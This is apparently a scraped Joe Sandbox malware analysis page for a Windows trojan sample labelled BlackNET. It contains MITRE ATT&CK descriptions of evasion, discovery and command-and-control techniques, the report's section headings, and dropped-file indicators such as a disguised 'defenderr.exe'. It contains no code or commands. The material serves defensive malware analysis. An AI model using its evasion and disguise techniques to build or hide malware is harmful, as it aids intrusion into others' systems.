Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: BlackNET

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\MyClient\defenderr.exe

C:\ProgramData\Microsoft\MyClient\defenderr.exe:Zone.Identifier

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_UPFNETTGWI1LHFPX_822adcd3087cb97c09b68d59117663987f8378_aca68100_0c314f9b\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_UPFNETTGWI1LHFPX_822adcd3087cb97c09b68d59117663987f8378_aca68100_1ad8b1b5\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER43E3.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4A1E.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4ABB.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9246.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER997B.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9A18.tmp.xml

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\defenderr.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Windows Analysis Report
HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe

Function 00007FFBAC180160 Relevance: 1.0, Instructions: 1004
COMMON

Function 00007FFBAC18048D Relevance: .8, Instructions: 809
COMMON

Function 00007FFBAC18A5B6 Relevance: .5, Instructions: 470
COMMON

Function 00007FFBAC18B362 Relevance: .5, Instructions: 458
COMMON